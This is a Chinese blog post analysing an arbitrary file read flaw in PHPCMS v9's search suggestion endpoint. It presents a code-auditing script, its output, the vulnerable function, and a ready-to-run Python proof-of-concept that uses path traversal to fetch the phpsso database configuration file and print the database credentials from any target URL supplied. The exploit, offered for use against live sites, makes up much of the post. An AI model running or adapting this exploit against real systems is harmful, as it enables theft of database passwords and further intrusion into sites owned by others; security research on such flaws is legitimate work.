phpcms v9 爆密码

最新推荐文章于 2023-03-27 17:02:50 发布
最新推荐文章于 2023-03-27 17:02:50 发布
阅读量452 收藏
点赞数
分类专栏: Web前端 python hacker 文章标签: php python 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84264253
版权
hacker 同时被 3 个专栏收录
53 篇文章 1 订阅
订阅专栏
Web前端
12 篇文章 0 订阅
订阅专栏
python
12 篇文章 0 订阅
订阅专栏

   1.首先是http://www.wooyun.org/bugs/wooyun-2010-010072

      有人报告phpcms v9 直接爆密码

    开始我还比较迷惑,因为我记得我看过phpcms v9 的管理员密码体系是有salt的,光爆密码没啥用啊?

 

  2.后面有人指出了是和前一个http://www.wooyun.org/bugs/wooyun-2010-09463的补充

      我记得这个漏洞开始报的是一个xss,实质则是一个file_get_contents的问题,就变成了任意文件浏览的问题

 

3  下来就是如何构造和如何找的问题了,

     我先利用了pfind 查找file_get_contents,得到如下结果:

#/usr/bin/python
import os
from sys import argv

class pfind:
    #hm=open("123.htm","r+")
    allfile=[]
    allpt=[]
    fun=["$_REQUEST","$_GET","$_POST","$_FILE","fput","fread","fwrite","file_get_contents","file_put_contents"]
    #fun=["include","include_once","require","require_once","show_source"]
    #fun=["eval","preg_replace+/e","assert","call_user_func","call_user_func_array","create_function"]
    #fun=["get_rid"]
    #fun=["select ","update","insret","$_SERVER","$_POST","$_COOKIE","$_REQUEST","$_FILES","$_ENV","$_HTTP_COOKIE_VARS","$_HTTP_ENV_VARS","$_HTTP_GET_VARS","$_HTTP_POST_FILES","$_HTTP_POST_VARS","$_HTTP_SERVER_VARS","system","exec","passthru","shell_exec","popen","proc_open","eval","assert","fwrite","fput","fread","file_put_contents","move_uploaded_file"]
    def getfl (self,fl):
        for i in os.listdir(fl):
            if os.path.isdir(fl+"\\"+i)==True:                
                ft=fl+"\\"+i
                self.getfl(ft)
            elif os.path.isfile(fl+"\\"+i)==True:
                self.findfun(fl+"\\"+i)
               # self.allfile.append(fl+"\\"+i)
    def findfun (self,fl):
        ln=1
        try:
            fl.split(".php")
        except:
            exit
        
        fp=open(fl,"r+")
        while True:
            line=fp.readline()
            if line:
                x=0
                while x< len(self.fun):
                    if self.fun[x] in line :
                        #print 
                        
                        print "[+] File: "+fl
                        print "[+] Line: "+str(ln)
                        print "[+] Have: "+self.fun[x]
                        print "[+] Code: "+line
                        
                    x=x+1

            else:
                break
            ln=ln+1
    def vfind (self,fl,val):
        ln=1
        fp=open(fl,"r+")
        while True:
            line=fp.readline()
            if line:
                if val in line:
                    print "[+] File: "+fl
                    print "[+] Have: "+val
                    print "[+] Line: "+str(ln)
                    print "[+] Code: "+line
            else:
                break
#'''
try:
    c=argv[1]
    if c=="-p":
        a=pfind()
        a.getfl(argv[2])
    elif c=="-f":
        a=pfind()
        a.fun=[argv[3]]
        a.getfl(argv[2])         
except:
    print "[+] Code By Cond0r QQ 707447667"
    print "[+] Blog Pythoner.blog.com"
    print "[+] usage: "+argv[0]+" -p c:\\1\\"
    print "[+] usage: "+argv[0]+" -f c:\\1\\  $value"
    #'''
#a=pfind()
#a.vfind("D:\DTServer\www\\22\\admin_permissions.php","a")
 

  写道

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $license = file_get_contents(PHPCMS_PATH."install/license.txt");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 78
[+] Have: file_get_contents
[+] Code: $returnid = @file_get_contents($remote_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 216
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 276
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/".$dbfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 330
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents(PHPCMS_PATH."install/main/testsql.sql");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 468
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\install\install.php
[+] Line: 484
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\cache_file.class.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\ip_area.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $data = $xml->xml_unserialize(@file_get_contents($api_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 34
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 55
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 143
[+] Have: file_get_contents
[+] Code: $str .= '$json = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\classes\template_cache.class.php
[+] Line: 150
[+] Have: file_get_contents
[+] Code: $str .= '$xml_data = @file_get_contents(\''.$datas['url'].'\');';

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\dir.func.php
[+] Line: 75
[+] Have: file_get_contents
[+] Code: file_put_contents($v, iconv($in_charset, $out_charset, file_get_contents($v)));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1561
[+] Have: file_get_contents
[+] Code: function pc_file_get_contents($url, $timeout=30) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\libs\functions\global.func.php
[+] Line: 1563
[+] Have: file_get_contents
[+] Code: return @file_get_contents($url, 0, $stream);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 262
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 266
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 383
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MEMBER_MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\cache_api.class.php
[+] Line: 387
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MEMBER_MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\card.class.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents(self::$server_url.$url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 42
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->installdir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 52
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\classes\module_api.class.php
[+] Line: 182
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($this->uninstalldir.$m.'.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 320
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\database.php
[+] Line: 329
[+] Have: file_get_contents
[+] Code: $sql = file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\functions\global.func.php
[+] Line: 49
[+] Have: file_get_contents
[+] Code: $str = file_get_contents($configfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\index.php
[+] Line: 288
[+] Have: file_get_contents
[+] Code: $snda_res_json = @file_get_contents($snda_check_url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 44
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 230
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_applist&s='.$s.'&p='.$p);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 233
[+] Have: file_get_contents
[+] Code: $recommed_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_recommed_applist&s=5&p=1');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 236
[+] Have: file_get_contents
[+] Code: $focus_data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_app_focus&num=3');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 252
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 268
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 337
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\admin\plugin.php
[+] Line: 377
[+] Have: file_get_contents
[+] Code: $data = file_get_contents('http://open.phpcms.cn/index.php?m=open&c=api&a=get_detail_byappid&id='.$id);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\cnzz\index.php
[+] Line: 22
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents('http://wss.cnzz.com/user/companion/phpcms.php?domain='.APP_PATH.'&key='.$key.'&cms=phpcms')) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\classes\collection.class.php
[+] Line: 218
[+] Have: file_get_contents
[+] Code: if (!empty($url) && $html = @file_get_contents($url)) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\collection\node.php
[+] Line: 154
[+] Have: file_get_contents
[+] Code: $data = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 135
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'content_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 139
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 195
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\content\sitemodel.php
[+] Line: 206
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 26
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'formguide_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\classes\formguide.class.php
[+] Line: 30
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\formguide\formguide.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $create_sql = file_get_contents(MODEL_PATH.'create.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 28
[+] Have: file_get_contents
[+] Code: $cache_data = file_get_contents(MODEL_PATH.'member_'.$classtype.'.class.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\member_cache.class.php
[+] Line: 32
[+] Have: file_get_contents
[+] Code: $cache_data .= file_get_contents(MODEL_PATH.$field.DIRECTORY_SEPARATOR.$classtype.'.inc.php');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\OauthSDK.class.php
[+] Line: 578
[+] Have: file_get_contents
[+] Code: @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\qqoauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 251
[+] Have: file_get_contents
[+] Code: file_get_contents(self::$POST_INPUT)

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\classes\weibooauth.class.php
[+] Line: 840
[+] Have: file_get_contents
[+] Code: $content = file_get_contents( $url );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 46
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 90
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_menu.php
[+] Line: 95
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 47
[+] Have: file_get_contents
[+] Code: $model_import = @file_get_contents($_FILES['model_import']['tmp_name']);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\member\member_model.php
[+] Line: 58
[+] Have: file_get_contents
[+] Code: $model_sql = file_get_contents(MODEL_PATH.'model.sql');

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 88
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 107
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$key);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\scan\index.php
[+] Line: 133
[+] Have: file_get_contents
[+] Code: $html = file_get_contents(PHPCMS_PATH.$url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 201
[+] Have: file_get_contents
[+] Code: $res = @file_get_contents($url);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\file.php
[+] Line: 82
[+] Have: file_get_contents
[+] Code: $data = htmlspecialchars(file_get_contents($filepath));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 8
[+] Have: file_get_contents
[+] Code: $data = file_get_contents($file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 48
[+] Have: file_get_contents
[+] Code: $data = @file_get_contents($filepath);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\functions\global.func.php
[+] Line: 65
[+] Have: file_get_contents
[+] Code: $template_bak_db->insert(array('creat_at'=>SYS_TIME,'fileid'=>$style."_".$dir."_".$filename, 'userid'=>param::get_cookie('userid'), 'username'=>param::get_cookie('admin_username'), 'template'=>new_addslashes(file_get_contents($filepath))));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\template\style.php
[+] Line: 71
[+] Have: file_get_contents
[+] Code: $code = json_decode(base64_decode(file_get_contents($filename)), true);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $pathlist_str = @file_get_contents($upgrade_path_base);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 69
[+] Have: file_get_contents
[+] Code: @file_put_contents($upgradezip_path, @file_get_contents($upgradezip_url));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 99
[+] Have: file_get_contents
[+] Code: if (strtolower(substr($file_list[$fk], -3, 3)) == 'sql' && $data = file_get_contents($file_list[$fk])) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 131
[+] Have: file_get_contents
[+] Code: $content = file_get_contents($menu_lan_file);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\upgrade\index.php
[+] Line: 187
[+] Have: file_get_contents
[+] Code: $phpcms_md5 = @file_get_contents($this->_upgrademd5.$current_version['pc_release'].'_'.CHARSET.".php");

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\api\uc.php
[+] Line: 21
[+] Have: file_get_contents
[+] Code: $post = xml_unserialize(file_get_contents('php://input'));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\cache_file.class.php
[+] Line: 74
[+] Have: file_get_contents
[+] Code: $data = unserialize(file_get_contents($filepath.$filename));

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\http.class.php
[+] Line: 54
[+] Have: file_get_contents
[+] Code: $this->post .= "\r\n".file_get_contents($v)."\r\n";

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 27
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 43
[+] Have: file_get_contents
[+] Code: $content = @file_get_contents ( $tplfile );

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\libs\classes\template_cache.class.php
[+] Line: 62
[+] Have: file_get_contents
[+] Code: $str = @file_get_contents ($tplfile);

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\applications.php
[+] Line: 156
[+] Have: file_get_contents
[+] Code: if ($data = @file_get_contents($url.'code='.urlencode($param))) {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpsso_server\phpcms\modules\admin\system.php
[+] Line: 56
[+] Have: file_get_contents
[+] Code: $html = file_get_contents($filepath);

 

非常多的file_get_contents,然后找到了有漏洞的在\phpcms\modules\search\index.php 下面的203行如下

	public function public_get_suggest_keyword() {
		#echo 'ice test';
		$url = $_GET['url'].'&q='.$_GET['q'];
		#echo $url ;
		$res = @file_get_contents($url);
		#echo $res;
		if(CHARSET != 'gbk') {
			$res = iconv('gbk', CHARSET, $res);
		}
		echo $res;
	}

 可以看到这里直接对url和q进行了拼接即: url+'&q='+q这种样子然后去file_get_content

 

然后就找可以利用的地方:

依然利用pfind,查找public_get_suggest_keyword,得到了如下代码

 

 写道
[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\phpcms\modules\search\index.php
[+] Line: 198
[+] Have: public_get_suggest_keyword
[+] Code: public function public_get_suggest_keyword() {

[+] File: F:\hacker\webproject\phpcms_v9\install_package\\\statics\js\search_suggest.js
[+] Line: 2
[+] Have: public_get_suggest_keyword
[+] Code: $("#q").suggest("?m=search&c=index&a=public_get_suggest_keyword&url="+encodeURIComponent('http://www.google.cn/complete/search?hl=zh-CN&q='+$("#q").val()), {

可以识别出是第二个就是调用这个危险方法的地方,可以抽取出来,也是比较直接的可以控制url和q参数,下来就是怎么构造本地文件路径的问题,由于存在&q=的问题,我陷入了误区不知如何绕过,然后看了疯子的exe,倒是解决了这个问题但原因不详....

 

 

最终写出了poc来

#! /usr/bin/env python
#coding=utf-8

"""
这个py脚本是针对phpcms v9 的配置文件的,具体功能简单粗暴
参考了乌云 http://www.wooyun.org/bugs/wooyun-2010-010072
以及 疯子blog的东西

Code By icefish
"""
from sys import argv
import urllib2
import re
def run(url):
    url=url+'/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php'
    print '\n\n***********get DataBase Password:*************\n'
    print url
    req = urllib2.Request(url)   
    resp = urllib2.urlopen(req) 
    info=resp.read()
    s=info.replace('	','')
    s=re.sub(r'<\?php\s*return\s*array\s*\(', '', s)
    s=re.sub(r'>', '', s,re.S)
    print '\n\n***********Get the Config.php****************'
    print s
    
    return info
    
if __name__=='__main__':
    try:
       
        url=argv[1]
        
        if url!=None:
            run(url)
    except:
        print "[+] Code By icefish WeiBo http://weibo.com/u/1703624267"
        print "[+] Blog http://wcf1987.iteye.com/"
        print "[+] usage: "+argv[0]+" http://www.test.com/"
 

 

 

 

实际危害上,如果数据库没开外连,我觉得似乎没什么大危险吧....个人看法,

 

 

 

 

 

 

wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpcmsv9新浪微博登陆
03-11
phpcmsv9新浪微博登陆完整教程+源码
PHPCMS V9后台密码
收集盒 Book box
01-03 2105
谷歌关键字:inurl:”index.php?m=content+c=rss+catid=10″ 在phpcms/api.php?op=add_favorite中使用了urldecode,导致了一个sqlinject漏洞。 $title = urldecode($title); 省略…… $data = array(‘title’=>$title, ‘url’=>$url,
记一次phpcms9.6.3漏洞利用getshell到内网域控
plant1234的博客
06-25 2410
首现利用nmap扫描网段收集到主机ip地址: 扫描主机信息: 发现是win7的操作系统和开放80端口直接访问网站: 得到:扫描目录发现管理员登陆: 得到:弱口令:admin admin12345phpcms9.6.3后台getshell的洞网上有很多可以参考这篇博客: https://blog.csdn.net/weixin_42433470/article/details/112409431我这里利用的是:用户->管理员模块->添加会员模型得到shell:用蚁剑连接shell然后利用cs上线:利用的模块
Phpcms V9管理后台密码重置的两种方法
ougexingfuba的博客
09-09 1632
最近,一个朋友使用NITC这个程序,忘记了管理密码,需要重置,研究了下方法,同样的类推:Phpcms V9管理后台密码忘记了应该怎么办?在这里,CMSYOU与大家分享下Phpcms V9管理后台密码重置的两种方法。 在PC V9里边,重置管理密码就没有Phpcms2008那么容易(PC2008怎么重置密码将在第二页讲到),需要同时修改MD5密文和一个随机的加密验证码。 如上图,passwo...
phpcms获取auth_key漏洞
收集盒 Book box
08-21 2738
1.  为所欲为漏洞: 注册登录后访问 http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1 查看源文件:     拿到这个:        aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0d
phpcms v9忘记后台密码解决方法
云曦沥雨
08-10 2566
1.在没有安装过phpcms v9的电脑上安装phpcms v9,管理员用户名为phpcms密码phpcms; 2.利用phpmyadmin访问mysql数据库,查找v9_admin表,里面有这个两个重要的字段信息:password和encrypt; 3.输入sql语句:SELECT * FROM `v9_admin` ,显示如下信息 userid userna
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1422
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
PHPCMS安装及调用代码
weixin_58838794的博客
03-27 1097
{previous_page[title]}文章下一篇:{next_page[title]}
PHPCMS V9管理员密码忘记如何修改
似水流年
03-04 800
一般的虚拟主机商都提供了PHPmyAdmin,选择你网站数据库,然后选择v9_admin这个表, 编辑 password,变成:fa3250300be9b7ab0848257f3cbb06e7 encrypt,变成:ucFfAp 这样密码就会被改成 phpcms了,就可以正常登录了。 也可以把  password 变成 eeddc98ecb7cca0b0502c8c1e7335
phpcms v9的问答模块插件
02-05
phpcms v9的问答模块插件,代码为utf8,经过测试可以用。 phpcms v9的问答模块插件,代码为utf8,经过测试可以用。
phpcms v9忘记管理员后台密码的解决方法
09-29
主要介绍了phpcms v9忘记管理员后台密码的解决方法,需要的朋友可以参考下
phpcms_v9 后台上传图片按钮无法点击
06-21
因为目前浏览器不支持flash,导致phpcms后台上传图片按钮无法点击,试了很多浏览器都不行。这个方法操作简单,亲测快速有效,原理是将原来的上传图片插件更改为h5图片上传插件。
phpcms V9 邮箱配置方法
09-29
phpcms自带邮箱系统,用来发送注册信息等内容,但QQ普通邮箱已经不支持此功能了。建议使用163邮箱
phpcms v9 人才招聘模块
01-26
安装方法: 一、先把压缩包中的templates上传到程序根目录,然后分别导入job_com.model 企业招聘... ... 二、建立栏目:建立求职招聘栏目,模型任选其中一个。建立子栏目“企业招聘”“个人求职”模型一定要对应起来。
python 反编译 pyc 一些心得
ice
09-06 2853
0x01 , 现在用python的人也多了起来,代码安全始终是我们要考虑的问题,比如说我们要将我们的成果发布去,py直接发布肯定是不行的(除非你是开源的),那么我们就只能考虑发布pyc文件了,     0x02,今天讨论的就是怎么反编译pyc到源代码的技术,从道理上来讲,这个是完全没问题的,而且反编译来的代码质量应该相当高才对(参考java class的原理),在百度里面搜索的话,信息量...
密码字典
ice
02-16 1728
这是我根据前一段各种密码门做的一个密码字典(大概通过3亿多账号统计来的,当然有重复,也有数据不规整),我给大家放来一部分高频密码统计  ...
metasploit 图形化界面和自动化exploit脚本
ice
10-21 1653
0x01 最新版的metasploit没了图形化界面,              armitage开始收费              那我们就选用msfgui吧,安装简单                https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe               下载安装就可以了 ...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1111
   首先这个是别人早都发来的一个漏洞,exp也写好了,如下 &lt;title&gt;eWebeditoR3.8 for php任意文件上EXP&lt;/title&gt; &lt;form action="" method=post enctype="multipart/form-data"&gt; &lt;INPUT TYPE="hidden" name="MAX_F
phpcms v9安装
最新发布
08-30
要安装phpcms v9,您可以按照以下步骤进行操作: 1. 首先,您需要下载phpcms v9的安装包,您可以从官方网站(https://www.phpcms.cn/)获取最新版本的安装包。 2. 解压下载的安装包,并将文件上传到您的Web服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值